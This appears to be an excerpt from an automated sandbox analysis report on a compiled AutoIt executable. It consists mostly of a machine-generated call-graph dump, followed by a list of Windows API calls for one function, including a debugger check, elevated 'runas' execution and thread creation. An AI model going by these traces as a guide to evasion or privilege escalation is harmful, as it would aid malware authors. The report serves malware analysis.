102728->102729 102763 68e54f Mailbox 102729->102763 102730 656ce7 102880 655c6f 102730->102880 102731 68e740 102891 6b72df 59 API calls Mailbox 102731->102891 102737 68e762 102892 6cfbce 59 API calls 2 library calls 102737->102892 102740 68e76f 102742 672d55 _free 58 API calls 102740->102742 102741 68e7d9 102895 6af7a1 89 API calls 4 library calls 102741->102895 102742->102744 102785 6557d4 102744->102785 102746 65750f 59 API calls 102746->102763 102747 68e7f2 102747->102730 102749 68e7d1 102894 6af5f7 59 API calls 4 library calls 102749->102894 102750 657de1 59 API calls 102750->102755 102755->102730 102755->102741 102755->102749 102755->102750 102873 65586d 67 API calls _wcscpy 102755->102873 102874 656f5d GetStringTypeW 102755->102874 102875 656ecc 60 API calls __wcsnicmp 102755->102875 102876 656faa GetStringTypeW __wsetenvp 102755->102876 102877 67363d GetStringTypeW _iswctype 102755->102877 102878 6568dc 165 API calls 3 library calls 102755->102878 102879 657213 59 API calls Mailbox 102755->102879 102756 657de1 59 API calls 102756->102763 102760 68e792 102893 6af7a1 89 API calls 4 library calls 102760->102893 102762 68e7ab 102764 672d55 _free 58 API calls 102762->102764 102763->102731 102763->102746 102763->102756 102763->102760 102887 6af73d 59 API calls 2 library calls 102763->102887 102888 6af65e 61 API calls 2 library calls 102763->102888 102889 6b737f 59 API calls Mailbox 102763->102889 102890 657213 59 API calls Mailbox 102763->102890 102765 68e7be 102764->102765 102765->102744 102767 6575af 102766->102767 102770 657522 _memmove 102766->102770 102769 670db6 Mailbox 59 API calls 102767->102769 102768 670db6 Mailbox 59 API calls 102771 657529 102768->102771 102769->102770 102770->102768 102772 670db6 Mailbox 59 API calls 102771->102772 102773 657552 102771->102773 102772->102773 102773->102649 102775 657370 102774->102775 102777 65741e 102774->102777 102776 670db6 Mailbox 59 API calls 102775->102776 102779 6573a2 102775->102779 102776->102779 102777->102649 102778 670db6 59 API calls Mailbox 102778->102779 102779->102777 102779->102778 102780->102635 102781->102649 102782->102649 102783->102649 102784->102645 102786 655c6f CloseHandle 102785->102786 102787 6557dc Mailbox 102786->102787 102788 655c6f CloseHandle 102787->102788 102789 6557eb 102788->102789 102789->102725 102791 670db6 Mailbox 59 API calls 102790->102791 102792 6557b6 102791->102792 102793 655c6f CloseHandle 102792->102793 102794 6557c1 102793->102794 102795 657667 59 API calls 102794->102795 102796 6557c9 102795->102796 102797 655c6f CloseHandle 102796->102797 102798 6557d0 102797->102798 102799 6557f6 102798->102799 102800 655c6f CloseHandle 102799->102800 102801 655802 102800->102801 102896 655c99 102801->102896 102803 655821 102807 655844 102803->102807 102904 655610 102803->102904 102805 655833 102921 65527b SetFilePointerEx SetFilePointerEx 102805->102921 102807->102678 102807->102683 102808 65583a 102808->102807 102809 68dc07 102808->102809 102922 6b345a SetFilePointerEx SetFilePointerEx WriteFile 102809->102922 102811 68dc37 102811->102807 102812->102688 102813->102708 102821 655b08 102814->102821 102815 68dd28 102936 655c4e SetFilePointerEx 102815->102936 102816 655b8f SetFilePointerEx 102935 655c4e SetFilePointerEx 102816->102935 102819 655b63 102819->102717 102820 68dd42 102821->102815 102821->102816 102821->102819 102823 657667 59 API calls 102822->102823 102824 6545b1 102823->102824 102825 657667 59 API calls 102824->102825 102826 6545b9 102825->102826 102827 657667 59 API calls 102826->102827 102828 6545c1 102827->102828 102829 657667 59 API calls 102828->102829 102830 6545c9 102829->102830 102831 6545fd 102830->102831 102832 68d4d2 102830->102832 102833 65784b 59 API calls 102831->102833 102834 658047 59 API calls 102832->102834 102835 65460b 102833->102835 102836 68d4db 102834->102836 102837 657d2c 59 API calls 102835->102837 102838 657d8c 59 API calls 102836->102838 102839 654615 102837->102839 102841 654640 102838->102841 102840 65784b 59 API calls 102839->102840 102839->102841 102844 654636 102840->102844 102842 654680 102841->102842 102845 65465f 102841->102845 102855 68d4fb 102841->102855 102937 65784b 102842->102937 102847 657d2c 59 API calls 102844->102847 102849 6579f2 59 API calls 102845->102849 102846 654691 102850 6546a3 102846->102850 102853 658047 59 API calls 102846->102853 102847->102841 102848 68d5cb 102851 657bcc 59 API calls 102848->102851 102852 654669 102849->102852 102854 6546b3 102850->102854 102856 658047 59 API calls 102850->102856 102868 68d588 102851->102868 102852->102842 102859 65784b 59 API calls 102852->102859 102853->102850 102858 6546ba 102854->102858 102860 658047 59 API calls 102854->102860 102855->102848 102857 68d5b4 102855->102857 102867 68d532 102855->102867 102856->102854 102857->102848 102863 68d59f 102857->102863 102861 658047 59 API calls 102858->102861 102870 6546c1 Mailbox 102858->102870 102859->102842 102860->102858 102861->102870 102862 6579f2 59 API calls 102862->102868 102866 657bcc 59 API calls 102863->102866 102864 68d590 102865 657bcc 59 API calls 102864->102865 102865->102868 102866->102868 102867->102864 102871 68d57b 102867->102871 102868->102842 102868->102862 102950 657924 59 API calls 2 library calls 102868->102950 102870->102706 102872 657bcc 59 API calls 102871->102872 102872->102868 102873->102755 102874->102755 102875->102755 102876->102755 102877->102755 102878->102755 102879->102755 102881 655c79 102880->102881 102882 655c88 102880->102882 102882->102881 102884->102678 102885->102685 102886->102712 102887->102763 102888->102763 102889->102763 102890->102763 102891->102737 102892->102740 102893->102762 102894->102741 102895->102747 102897 68dd58 102896->102897 102898 655cb2 CreateFileW 102896->102898 102899 68dd5e CreateFileW 102897->102899 102900 655cd4 102897->102900 102898->102900 102899->102900 102901 68dd84 102899->102901 102900->102803 102902 655aee 2 API calls 102901->102902 102903 68dd8f 102902->102903 102903->102900 102905 68dba5 102904->102905 102906 65562b 102904->102906 102920 6556ba 102905->102920 102929 655cdf 102905->102929 102907 655aee 2 API calls 102906->102907 102906->102920 102908 65564d 102907->102908 102909 65522e 59 API calls 102908->102909 102911 655657 102909->102911 102911->102905 102912 655664 102911->102912 102913 670db6 Mailbox 59 API calls 102912->102913 102914 65566f 102913->102914 102915 65522e 59 API calls 102914->102915 102916 65567a 102915->102916 102923 655bc0 102916->102923 102918 6556a7 102919 655aee 2 API calls 102918->102919 102919->102920 102920->102805 102921->102808 102922->102811 102924 655c33 102923->102924 102927 655bce 102923->102927 102934 655c4e SetFilePointerEx 102924->102934 102925 655bf6 102925->102918 102927->102925 102928 655c06 ReadFile 102927->102928 102928->102925 102928->102927 102930 655aee 2 API calls 102929->102930 102931 655d00 102930->102931 102932 655aee 2 API calls 102931->102932 102933 655d14 102932->102933 102933->102920 102934->102927 102935->102819 102936->102820 102938 6578b7 102937->102938 102939 65785a 102937->102939 102940 657d2c 59 API calls 102938->102940 102939->102938 102941 657865 102939->102941 102947 657888 _memmove 102940->102947 102942 68eb09 102941->102942 102943 657880 102941->102943 102952 658029 102942->102952 102951 657f27 59 API calls Mailbox 102943->102951 102946 68eb13 102948 670db6 Mailbox 59 API calls 102946->102948 102947->102846 102949 68eb33 102948->102949 102950->102868 102951->102947 102953 670db6 Mailbox 59 API calls 102952->102953 102954 658033 102953->102954 102954->102946 102955->101567 102957 656d95 102956->102957 102962 656ea9 102956->102962 102958 670db6 Mailbox 59 API calls 102957->102958 102957->102962 102959 656dbc 102958->102959 102960 670db6 Mailbox 59 API calls 102959->102960 102966 656e31 102960->102966 102962->101571 102964 65735d 59 API calls 102964->102966 102965 65750f 59 API calls 102965->102966 102966->102962 102966->102964 102966->102965 102969 656240 102966->102969 102994 6a6553 59 API calls Mailbox 102966->102994 102967->101573 102968->101575 102995 657a16 102969->102995 102971 65646a 102972 65750f 59 API calls 102971->102972 102973 656484 Mailbox 102972->102973 102973->102966 102974 656265 102974->102971 102977 68dff6 102974->102977 102978 656799 _memmove 102974->102978 102979 65750f 59 API calls 102974->102979 102984 657d8c 59 API calls 102974->102984 102987 68df92 102974->102987 102991 657e4f 59 API calls 102974->102991 103000 655f6c 60 API calls 102974->103000 103001 655d41 59 API calls Mailbox 102974->103001 103002 655e72 60 API calls 102974->103002 103003 657924 59 API calls 2 library calls 102974->103003 103004 6af8aa 91 API calls 4 library calls 102977->103004 103005 6af8aa 91 API calls 4 library calls 102978->103005 102979->102974 102982 68e004 102985 65750f 59 API calls 102982->102985 102984->102974 102988 658029 59 API calls 102987->102988 102989 68df9d 102988->102989 102993 670db6 Mailbox 59 API calls 102989->102993 102992 65643b CharUpperBuffW 102991->102992 102992->102974 102993->102978 102994->102966 102996 670db6 Mailbox 59 API calls 102995->102996 102997 657a3b 102996->102997 102998 658029 59 API calls 102997->102998 102999 657a4a 102998->102999 102999->102974 103000->102974 103001->102974 103002->102974 103003->102974 103004->102982 103005->102973 103006->101589 103007->101590 103009 654196 103008->103009 103010 68d423 103008->103010 103009->101596 103034 6b2f94 62 API calls _W_store_winword 103009->103034 103010->103009 103011 68d42c DestroyIcon 103010->103011 103011->103009 103034->101596 103043 65e6d5 103042->103043 103091->101679 103092->101679 103095->101679 103096->101618 103097->101618 103098->101618 103099->101679 103100->101679 103101->101679 103120->101679 103121->101679 103122->101679 103538 651066 103543 65f76f 103538->103543 103540 65106c 103541 672d40 __cinit 67 API calls 103540->103541 103542 651076 103541->103542 103544 65f790 103543->103544 103576 66ff03 103544->103576 103548 65f7d7 103549 657667 59 API calls 103548->103549 103550 65f7e1 103549->103550 103551 657667 59 API calls 103550->103551 103552 65f7eb 103551->103552 103553 657667 59 API calls 103552->103553 103554 65f7f5 103553->103554 103555 657667 59 API calls 103554->103555 103556 65f833 103555->103556 103557 657667 59 API calls 103556->103557 103558 65f8fe 103557->103558 103586 665f87 103558->103586 103562 65f930 103563 657667 59 API calls 103562->103563 103564 65f93a 103563->103564 103614 66fd9e 103564->103614 103566 65f981 103567 65f991 GetStdHandle 103566->103567 103568 6945ab 103567->103568 103569 65f9dd 103567->103569 103568->103569 103570 6945b4 103568->103570 103571 65f9e5 OleInitialize 103569->103571 103621 6b6b38 64 API calls Mailbox 103570->103621 103571->103540 103573 6945bb 103622 6b7207 CreateThread 103573->103622 103575 6945c7 CloseHandle 103575->103571 103623 66ffdc 103576->103623 103579 66ffdc 59 API calls 103580 66ff45 103579->103580 103581 657667 59 API calls 103580->103581 103582 66ff51 103581->103582 103583 657bcc 59 API calls 103582->103583 103584 65f796 103583->103584 103585 670162 6 API calls 103584->103585 103585->103548 103587 657667 59 API calls 103586->103587 103588 665f97 103587->103588 103589 657667 59 API calls 103588->103589 103590 665f9f 103589->103590 103630 665a9d 103590->103630 103593 665a9d 59 API calls 103594 665faf 103593->103594 103595 657667 59 API calls 103594->103595 103596 665fba 103595->103596 103597 670db6 Mailbox 59 API calls 103596->103597 103598 65f908 103597->103598 103599 6660f9 103598->103599 103600 666107 103599->103600 103601 657667 59 API calls 103600->103601 103602 666112 103601->103602 103603 657667 59 API calls 103602->103603 103604 66611d 103603->103604 103605 657667 59 API calls 103604->103605 103606 666128 103605->103606 103607 657667 59 API calls 103606->103607 103608 666133 103607->103608 103609 665a9d 59 API calls 103608->103609 103610 66613e 103609->103610 103611 670db6 Mailbox 59 API calls 103610->103611 103612 666145 RegisterWindowMessageW 103611->103612 103612->103562 103615 6a576f 103614->103615 103616 66fdae 103614->103616 103633 6b9ae7 60 API calls 103615->103633 103617 670db6 Mailbox 59 API calls 103616->103617 103620 66fdb6 103617->103620 103619 6a577a 103620->103566 103621->103573 103622->103575 103634 6b71ed 65 API calls 103622->103634 103624 657667 59 API calls 103623->103624 103625 66ffe7 103624->103625 103626 657667 59 API calls 103625->103626 103627 66ffef 103626->103627 103628 657667 59 API calls 103627->103628 103629 66ff3b 103628->103629 103629->103579 103631 657667 59 API calls 103630->103631 103632 665aa5 103631->103632 103632->103593 103633->103619 103635 651016 103640 654974 103635->103640 103638 672d40 __cinit 67 API calls 103639 651025 103638->103639 103641 670db6 Mailbox 59 API calls 103640->103641 103642 65497c 103641->103642 103643 65101b 103642->103643 103647 654936 103642->103647 103643->103638 103648 654951 103647->103648 103649 65493f 103647->103649 103651 6549a0 103648->103651 103650 672d40 __cinit 67 API calls 103649->103650 103650->103648 103652 657667 59 API calls 103651->103652 103653 6549b8 GetVersionExW 103652->103653 103654 657bcc 59 API calls 103653->103654 103655 6549fb 103654->103655 103656 657d2c 59 API calls 103655->103656 103665 654a28 103655->103665 103657 654a1c 103656->103657 103658 657726 59 API calls 103657->103658 103658->103665 103659 654a93 GetCurrentProcess IsWow64Process 103660 654aac 103659->103660 103662 654ac2 103660->103662 103663 654b2b GetSystemInfo 103660->103663 103661 68d864 103675 654b37 103662->103675 103664 654af8 103663->103664 103664->103643 103665->103659 103665->103661 103668 654ad4 103671 654b37 2 API calls 103668->103671 103669 654b1f GetSystemInfo 103670 654ae9 103669->103670 103670->103664 103672 654aef FreeLibrary 103670->103672 103673 654adc GetNativeSystemInfo 103671->103673 103672->103664 103673->103670 103676 654ad0 103675->103676 103677 654b40 LoadLibraryA 103675->103677 103676->103668 103676->103669 103677->103676 103678 654b51 GetProcAddress 103677->103678 103678->103676 103679 68fdfc 103694 65ab30 Mailbox _memmove 103679->103694 103681 6a617e Mailbox 59 API calls 103693 65a057 103681->103693 103683 65b525 103879 6b9e4a 89 API calls 4 library calls 103683->103879 103686 670db6 59 API calls Mailbox 103705 659f37 Mailbox 103686->103705 103687 6909e5 103884 6b9e4a 89 API calls 4 library calls 103687->103884 103688 690055 103878 6b9e4a 89 API calls 4 library calls 103688->103878 103690 65b475 103700 658047 59 API calls 103690->103700 103694->103683 103694->103693 103694->103705 103706 657de1 59 API calls 103694->103706 103710 6cbc6b 341 API calls 103694->103710 103712 65b2b6 103694->103712 103714 659ea0 341 API calls 103694->103714 103715 69086a 103694->103715 103717 690878 103694->103717 103719 69085c 103694->103719 103720 65b21c 103694->103720 103722 670db6 59 API calls Mailbox 103694->103722 103725 6a6e8f 59 API calls 103694->103725 103727 6557a6 60 API calls 103694->103727 103731 6cdf23 103694->103731 103734 6bd07b 103694->103734 103781 6c445a 103694->103781 103790 661fc3 103694->103790 103830 6cc2e0 103694->103830 103862 6b7956 103694->103862 103868 6a617e 103694->103868 103873 659c90 59 API calls Mailbox 103694->103873 103877 6cc193 85 API calls 2 library calls 103694->103877 103695 690064 103696 658047 59 API calls 103696->103705 103697 65b47a 103697->103687 103697->103688 103700->103693 103702 6a6e8f 59 API calls 103702->103705 103703 657667 59 API calls 103703->103705 103704 672d40 67 API calls __cinit 103704->103705 103705->103686 103705->103688 103705->103690 103705->103693 103705->103696 103705->103697 103705->103702 103705->103703 103705->103704 103707 6909d6 103705->103707 103709 65a55a 103705->103709 103871 65c8c0 341 API calls 2 library calls 103705->103871 103872 65b900 60 API calls Mailbox 103705->103872 103706->103694 103883 6b9e4a 89 API calls 4 library calls 103707->103883 103882 6b9e4a 89 API calls 4 library calls 103709->103882 103710->103694 103876 65f6a3 341 API calls 103712->103876 103714->103694 103880 659c90 59 API calls Mailbox 103715->103880 103881 6b9e4a 89 API calls 4 library calls 103717->103881 103719->103681 103719->103693 103874 659d3c 60 API calls Mailbox 103720->103874 103722->103694 103723 65b22d 103875 659d3c 60 API calls Mailbox 103723->103875 103725->103694 103727->103694 103732 6ccadd 130 API calls 103731->103732 103733 6cdf33 103732->103733 103733->103694 103735 6bd0a5 103734->103735 103736 6bd09a 103734->103736 103740 657667 59 API calls 103735->103740 103778 6bd17f Mailbox 103735->103778 103885 659b3c 59 API calls 103736->103885 103738 670db6 Mailbox 59 API calls 103739 6bd1c8 103738->103739 103741 6bd1d4 103739->103741 103743 6557a6 60 API calls 103739->103743 103742 6bd0c9 103740->103742 103745 659837 84 API calls 103741->103745 103744 657667 59 API calls 103742->103744 103743->103741 103746 6bd0d2 103744->103746 103747 6bd1ec 103745->103747 103748 659837 84 API calls 103746->103748 103750 6557f6 67 API calls 103747->103750 103749 6bd0de 103748->103749 103751 65459b 59 API calls 103749->103751 103752 6bd1fb 103750->103752 103755 6bd0f3 103751->103755 103753 6bd1ff GetLastError 103752->103753 103754 6bd233 103752->103754 103756 6bd218 103753->103756 103759 6bd25e 103754->103759 103760 6bd295 103754->103760 103757 657b2e 59 API calls 103755->103757 103776 6bd188 Mailbox 103756->103776 103888 6558ba CloseHandle 103756->103888 103758 6bd126 103757->103758 103761 6bd178 103758->103761 103766 6b3c37 3 API calls 103758->103766 103763 670db6 Mailbox 59 API calls 103759->103763 103762 670db6 Mailbox 59 API calls 103760->103762 103887 659b3c 59 API calls 103761->103887 103767 6bd29a 103762->103767 103768 6bd263 103763->103768 103770 6bd136 103766->103770 103773 657667 59 API calls 103767->103773 103767->103776 103769 6bd274 103768->103769 103771 657667 59 API calls 103768->103771 103889 6cfbce 59 API calls 2 library calls 103769->103889 103770->103761 103772 6bd13a 103770->103772 103771->103769 103775 657de1 59 API calls 103772->103775 103773->103776 103777 6bd147 103775->103777 103776->103694 103886 6b3a2a 63 API calls Mailbox 103777->103886 103778->103738 103778->103776 103780 6bd150 Mailbox 103780->103761 103782 659837 84 API calls 103781->103782 103783 6c4494 103782->103783 103784 656240 94 API calls 103783->103784 103785 6c44a4 103784->103785 103786 6c44c9 103785->103786 103787 659ea0 341 API calls 103785->103787 103789 6c44cd 103786->103789 103890 659a98 103786->103890 103787->103786 103789->103694 103791 659a98 59 API calls 103790->103791 103792 661fdb 103791->103792 103793 670db6 Mailbox 59 API calls 103792->103793 103798 696585 103792->103798 103795 661ff4 103793->103795 103796 662004 103795->103796 103799 6557a6 60 API calls 103795->103799 103800 659837 84 API calls 103796->103800 103797 662029 103805 662036 103797->103805 103922 659b3c 59 API calls 103797->103922 103798->103797 103921 6bf574 59 API calls 103798->103921 103799->103796 103802 662012 103800->103802 103804 6557f6 67 API calls 103802->103804 103803 6965cd 103803->103805 103806 6965d5 103803->103806 103807 662021 103804->103807 103809 655cdf 2 API calls 103805->103809 103923 659b3c 59 API calls 103806->103923 103807->103797 103807->103798 103920 6558ba CloseHandle 103807->103920 103811 66203d 103809->103811 103812 662057 103811->103812 103813 6965e7 103811->103813 103814 657667 59 API calls 103812->103814 103815 670db6 Mailbox 59 API calls 103813->103815 103816 66205f 103814->103816 103817 6965ed 103815->103817 103903 655572 103816->103903 103819 696601 103817->103819 103924 655850 ReadFile SetFilePointerEx 103817->103924 103824 696605 _memmove 103819->103824 103925 6b76c4 59 API calls 2 library calls 103819->103925 103821 66206e 103821->103824 103918 659a3c 59 API calls Mailbox 103821->103918 103825 662082 Mailbox 103826 6620bc 103825->103826 103827 655c6f CloseHandle 103825->103827 103826->103694 103828 6620b0 103827->103828 103828->103826 103919 6558ba CloseHandle 103828->103919 103831 657667 59 API calls 103830->103831 103832 6cc2f4 103831->103832 103833 657667 59 API calls 103832->103833 103834 6cc2fc 103833->103834 103835 657667 59 API calls 103834->103835 103836 6cc304 103835->103836 103837 659837 84 API calls 103836->103837 103857 6cc312 103837->103857 103838 657bcc 59 API calls 103838->103857 103839 657924 59 API calls 103839->103857 103840 6cc4fb 103841 6cc528 Mailbox 103840->103841 103965 659a3c 59 API calls Mailbox 103840->103965 103841->103694 103843 6cc4e2 103844 657cab 59 API calls 103843->103844 103847 6cc4ef 103844->103847 103845 6cc4fd 103848 657cab 59 API calls 103845->103848 103846 658047 59 API calls 103846->103857 103850 657b2e 59 API calls 103847->103850 103851 6cc50c 103848->103851 103849 657e4f 59 API calls 103852 6cc3a9 CharUpperBuffW 103849->103852 103850->103840 103853 657b2e 59 API calls 103851->103853 103963 65843a 68 API calls 103852->103963 103853->103840 103854 657e4f 59 API calls 103856 6cc469 CharUpperBuffW 103854->103856 103964 65c5a7 69 API calls 2 library calls 103856->103964 103857->103838 103857->103839 103857->103840 103857->103841 103857->103843 103857->103845 103857->103846 103857->103849 103857->103854 103859 659837 84 API calls 103857->103859 103860 657cab 59 API calls 103857->103860 103861 657b2e 59 API calls 103857->103861 103859->103857 103860->103857 103861->103857 103863 6b7962 103862->103863 103864 670db6 Mailbox 59 API calls 103863->103864 103865 6b7970 103864->103865 103866 6b797e 103865->103866 103867 657667 59 API calls 103865->103867 103866->103694 103867->103866 103966 6a60c0 103868->103966 103870 6a618c 103870->103694 103871->103705 103872->103705 103873->103694 103874->103723 103875->103712 103876->103683 103877->103694 103878->103695 103879->103719 103880->103719 103881->103719 103882->103693 103883->103687 103884->103693 103885->103735 103886->103780 103887->103778 103888->103776 103889->103776 103891 659aa8 103890->103891 103892 68f7d6 103890->103892 103896 670db6 Mailbox 59 API calls 103891->103896 103894 657bcc 59 API calls 103892->103894 103897 68f7e7 103892->103897 103893 657d8c 59 API calls 103895 68f7f1 103893->103895 103894->103897 103900 659ad4 103895->103900 103901 657667 59 API calls 103895->103901 103898 659abb 103896->103898 103897->103893 103898->103895 103899 659ac6 103898->103899 103899->103900 103902 657de1 59 API calls 103899->103902 103900->103789 103901->103900 103902->103900 103904 6555a2 103903->103904 103905 65557d 103903->103905 103906 657d8c 59 API calls 103904->103906 103905->103904 103910 65558c 103905->103910 103909 6b325e 103906->103909 103907 6b328d 103907->103821 103909->103907 103926 6b31fa ReadFile SetFilePointerEx 103909->103926 103927 657924 59 API calls 2 library calls 103909->103927 103928 655ab8 103910->103928 103916 6b339c Mailbox 103916->103821 103918->103825 103919->103826 103920->103798 103921->103798 103922->103803 103923->103811 103924->103819 103925->103824 103926->103909 103927->103909 103929 670db6 Mailbox 59 API calls 103928->103929 103930 655acb 103929->103930 103931 670db6 Mailbox 59 API calls 103930->103931 103932 655ad7 103931->103932 103933 6554d2 103932->103933 103940 6558cf 103933->103940 103935 655514 103935->103916 103939 6577da 61 API calls Mailbox 103935->103939 103936 655bc0 2 API calls 103937 6554e3 103936->103937 103937->103935 103937->103936 103947 655a7a 103937->103947 103939->103916 103941 68dc3c 103940->103941 103942 6558e0 103940->103942 103956 6a5ecd 59 API calls Mailbox 103941->103956 103942->103937 103944 68dc46 103945 670db6 Mailbox 59 API calls 103944->103945 103946 68dc52 103945->103946 103948 68dcee 103947->103948 103949 655a8e 103947->103949 103962 6a5ecd 59 API calls Mailbox 103948->103962 103957 6559b9 103949->103957 103952 68dcf9 103954 670db6 Mailbox 59 API calls 103952->103954 103953 655a9a 103953->103937 103955 68dd0e _memmove 103954->103955 103956->103944 103958 6559d1 103957->103958 103961 6559ca _memmove 103957->103961 103959 68dc7e 103958->103959 103960 670db6 Mailbox 59 API calls 103958->103960 103960->103961 103961->103953 103962->103952 103963->103857 103964->103857 103965->103841 103967 6a60e8 103966->103967 103968 6a60cb 103966->103968 103967->103870 103968->103967 103970 6a60ab 59 API calls Mailbox 103968->103970 103970->103968 103971 653633 103972 65366a 103971->103972 103973 6536e7 103972->103973 103974 653688 103972->103974 104011 6536e5 103972->104011 103976 68d0cc 103973->103976 103977 6536ed 103973->103977 103978 653695 103974->103978 103979 65374b PostQuitMessage 103974->103979 103975 6536ca DefWindowProcW 104013 6536d8 103975->104013 104020 661070 10 API calls Mailbox 103976->104020 103980 653715 SetTimer RegisterWindowMessageW 103977->103980 103981 6536f2 103977->103981 103983 6536a0 103978->103983 103984 68d154 103978->103984 103979->104013 103989 65373e CreatePopupMenu 103980->103989 103980->104013 103986 68d06f 103981->103986 103987 6536f9 KillTimer 103981->103987 103990 653755 103983->103990 103991 6536a8 103983->103991 104025 6b2527 71 API calls _memset 103984->104025 103996 68d0a8 MoveWindow 103986->103996 103997 68d074 103986->103997 104016 65443a Shell_NotifyIconW _memset 103987->104016 103988 68d0f3 104021 661093 341 API calls Mailbox 103988->104021 103989->104013 104018 6544a0 64 API calls _memset 103990->104018 103992 68d139 103991->103992 103993 6536b3 103991->103993 103992->103975 104024 6a7c36 59 API calls Mailbox 103992->104024 104000 6536be 103993->104000 104001 68d124 103993->104001 103994 68d166 103994->103975 103994->104013 103996->104013 104003 68d078 103997->104003 104004 68d097 SetFocus 103997->104004 104000->103975 104022 65443a Shell_NotifyIconW _memset 104000->104022 104023 6b2d36 81 API calls _memset 104001->104023 104002 653764 104002->104013 104003->104000 104006 68d081 104003->104006 104004->104013 104005 65370c 104017 653114 DeleteObject DestroyWindow Mailbox 104005->104017 104019 661070 10 API calls Mailbox 104006->104019 104011->103975 104014 68d118 104015 65434a 68 API calls 104014->104015 104015->104011 104016->104005 104017->104013 104018->104002 104019->104013 104020->103988 104021->104000 104022->104014 104023->104002 104024->104011 104025->103994 104026 65107d 104031 65708b 104026->104031 104028 65108c 104029 672d40 __cinit 67 API calls 104028->104029 104030 651096 104029->104030 104032 65709b __write_nolock 104031->104032 104033 657667 59 API calls 104032->104033 104034 657151 104033->104034 104035 654706 61 API calls 104034->104035 104036 65715a 104035->104036 104062 67050b 104036->104062 104039 657cab 59 API calls 104040 657173 104039->104040 104041 653f74 59 API calls 104040->104041 104042 657182 104041->104042 104043 657667 59 API calls 104042->104043 104044 65718b 104043->104044 104045 657d8c 59 API calls 104044->104045 104046 657194 RegOpenKeyExW 104045->104046 104047 68e8b1 RegQueryValueExW 104046->104047 104051 6571b6 Mailbox 104046->104051 104048 68e8ce 104047->104048 104049 68e943 RegCloseKey 104047->104049 104050 670db6 Mailbox 59 API calls 104048->104050 104049->104051 104061 68e955 _wcscat Mailbox __wsetenvp 104049->104061 104052 68e8e7 104050->104052 104051->104028 104054 65522e 59 API calls 104052->104054 104053 6579f2 59 API calls 104053->104061 104055 68e8f2 RegQueryValueExW 104054->104055 104056 68e90f 104055->104056 104058 68e929 104055->104058 104057 657bcc 59 API calls 104056->104057 104057->104058 104058->104049 104059 657de1 59 API calls 104059->104061 104060 653f74 59 API calls 104060->104061 104061->104051 104061->104053 104061->104059 104061->104060 104063 681940 __write_nolock 104062->104063 104064 670518 GetFullPathNameW 104063->104064 104065 67053a 104064->104065 104066 657bcc 59 API calls 104065->104066 104067 657165 104066->104067 104067->104039 104068 32d23b0 104082 32d0000 104068->104082 104070 32d2432 104085 32d22a0 104070->104085 104088 32d3460 GetPEB 104082->104088 104084 32d068b 104084->104070 104086 32d22a9 Sleep 104085->104086 104087 32d22b7 104086->104087 104089 32d348a 104088->104089 104089->104084 104090 65e5ab 104093 65d100 104090->104093 104092 65e5b9 104094 65d11d 104093->104094 104111 65d37d 104093->104111 104095 692691 104094->104095 104096 6926e0 104094->104096 104117 65d144 104094->104117 104097 692694 104095->104097 104106 6926af 104095->104106 104137 6ca3e6 341 API calls __cinit 104096->104137 104100 6926a0 104097->104100 104097->104117 104135 6ca9fa 341 API calls 104100->104135 104103 672d40 __cinit 67 API calls 104103->104117 104104 6928b5 104104->104104 104105 65d54b 104105->104092 104106->104111 104136 6caea2 341 API calls 3 library calls 104106->104136 104107 65d434 104129 658a52 68 API calls 104107->104129 104111->104105 104142 6b9e4a 89 API calls 4 library calls 104111->104142 104112 6927fc 104141 6ca751 89 API calls 104112->104141 104113 65d443 104113->104092 104116 6584c0 69 API calls 104116->104117 104117->104103 104117->104105 104117->104107 104117->104111 104117->104112 104117->104116 104124 659ea0 341 API calls 104117->104124 104125 658047 59 API calls 104117->104125 104127 658740 68 API calls __cinit 104117->104127 104128 658542 68 API calls 104117->104128 104130 65843a 68 API calls 104117->104130 104131 65cf7c 341 API calls 104117->104131 104132 659dda 59 API calls Mailbox 104117->104132 104133 65cf00 89 API calls 104117->104133 104134 65cd7d 341 API calls 104117->104134 104138 658a52 68 API calls 104117->104138 104139 659d3c 60 API calls Mailbox 104117->104139 104140 6a678d 60 API calls 104117->104140 104124->104117 104125->104117 104127->104117 104128->104117 104129->104113 104130->104117 104131->104117 104132->104117 104133->104117 104134->104117 104135->104105 104136->104111 104137->104117 104138->104117 104139->104117 104140->104117 104141->104111 104142->104104 104143 65552a 104144 655ab8 59 API calls 104143->104144 104145 65553c 104144->104145 104146 6554d2 61 API calls 104145->104146 104147 65554a 104146->104147 104149 65555a Mailbox 104147->104149 104150 658061 61 API calls Mailbox 104147->104150 104150->104149

                                                    Executed Functions

                                                    Function 00653B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00653B68
                                                    • IsDebuggerPresent.KERNEL32 ref: 00653B7A
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,007152F8,007152E0,?,?), ref: 00653BEB
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                      • Part of subcall function 0066092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00653C14,007152F8,?,?,?), ref: 0066096E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00653C6F
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00707770,00000010), ref: 0068D281
                                                    • SetCurrentDirectoryW.KERNEL32(?,007152F8,?,?,?), ref: 0068D2B9
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00704260,007152F8,?,?,?), ref: 0068D33F
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0068D346
                                                      • Part of subcall function 00653A46: GetSysColorBrush.USER32(0000000F), ref: 00653A50
                                                      • Part of subcall function 00653A46: LoadCursorW.USER32(00000000,00007F00), ref: 00653A5F
                                                      • Part of subcall function 00653A46: LoadIconW.USER32(00000063), ref: 00653A76
                                                      • Part of subcall function 00653A46: LoadIconW.USER32(000000A4), ref: 00653A88
                                                      • Part of subcall function 00653A46: LoadIconW.USER32(000000A2), ref: 00653A9A
                                                      • Part of subcall function 00653A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00653AC0
                                                      • Part of subcall function 00653A46: RegisterClassExW.USER32(?), ref: 00653B16
                                                      • Part of subcall function 006539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00653A03
                                                      • Part of subcall function 006539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00653A24
